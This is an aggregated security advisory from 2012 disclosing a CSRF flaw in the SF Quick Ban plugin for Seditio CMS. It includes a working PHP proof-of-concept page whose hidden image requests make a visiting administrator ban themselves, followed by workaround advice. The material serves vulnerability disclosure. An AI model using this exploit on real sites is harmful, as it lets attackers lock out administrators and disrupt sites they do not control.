Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27971
HistoryApr 23, 2012 - 12:00 a.m.

sfquickban_plugin_CSRF

2012-04-2300:00:00
vulners.com
37

================================================================
Vulnerable Software: SF - Quick Ban (sfquickban version 1.0) is Plugin for Seditio CMS.
http://www.seditioforge.com/plugins/administration/sf-quick-ban-i65.html
http://www.seditioforge.com/page.php?id=65&a=dl
(MD5 SUM: a5075ed4f59a0d6889539c792776606b *1-sfquickban.rar)

About Software:
SF - Quick Ban plugin is usefull and popular plugin for Seditio CMS.
It has usefull functionality for admins/moderators for ban users.(Sounds a bit rudy:D)

Author notes:
Well, I got Tired of having to manually Ban IP's and Accounts. So I mad this tool to do this with one click

What it does
Searches the User DB for any Account with the IP address your banning. Each of these accounts is banned.
Also, it clears out all icq/msn/avatar/photo/signature/location/etc fields (including all extra) fields that a user could edit.
This will also Delete all PFS, and any uploaded Avatar/Photo/Signature.
And Add and entry into the Banlist for that IP.

Accounts banned like this Will have a log generated for every account, and there will be an output telling you each account that was banned with this.

How To Use this?
Look for the "Quick Ban" Links In Forum Posts, and the User Edit Screen.
(Only these 2 spots because its the only 2 spots where IP's can be listed and hooked into) Just click the Link, Confirm, Banned :)

Vuln Desc:
This plugin is vulnerable to CROSS SITE REQUEST FORGERY VULNERABILITY.
It uses $_GET without any proper check of request validity (no tokenization) when it deals
with ban action.
So,it can be used by malicious people to ban others(include admins/moderators too)
I noticed seditio 165.x versions from seditio-eklenti.com uses it defaultly.
Once admin(s) banned this is not easy operation to "escape" them from database.
So it may create also "headache" for them.

Proof of concept exploit:
(All in one CSRF exploit)
When admin with UID=1 visits this specially crafted malicious(exploit) page he/she will be
banned automatically (of course if there currently sfquick/quickban ban plugin(s) installed)

============== EXPLOIT========================
<?php
error_reporting('off');
/*
Ban Admin CSRF exploit
4 Fun
tested under seditio 165.x from seditio-eklenti.com/ seditio-build170.20120302 from neocrome.net

OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
±----------+
| version() |
±----------+
| 5.5.21 |
±----------+

*/

$site='http://192.168.0.15/learn/128/sed/seditio.170/&#39;;// define your target site here.

$funmsg='While you sit here I\'m banning you) Meh MeH MeH :D';// Your message here

die(str_repeat(PHP_EOL,300) .'<img src="' . $site . '/users.php?m=quickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
. '&a=confirmed" width="0" height="0" />'. PHP_EOL .

'<img src="' . $site . '/plug.php?e=sfquickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
. '&a=confirmed" width="0" height="0" />' .
'<h1>' . strrev($funmsg) . '</h1>');

?>
===============EOF===========================

============= Workaround=======================
Do not use outdated plugins.
Try to Keep all your software Up2Date
Uninstall SF - Quick Ban /Quickview plugin(s).
Do not use administrative accounts for daily usage
Download Seditio From Official Vendors only.
=====PLEASE==HELP TO KEEP SEDITIO SECURE==========

+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team ++Salamlar Bro-lar:))
++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^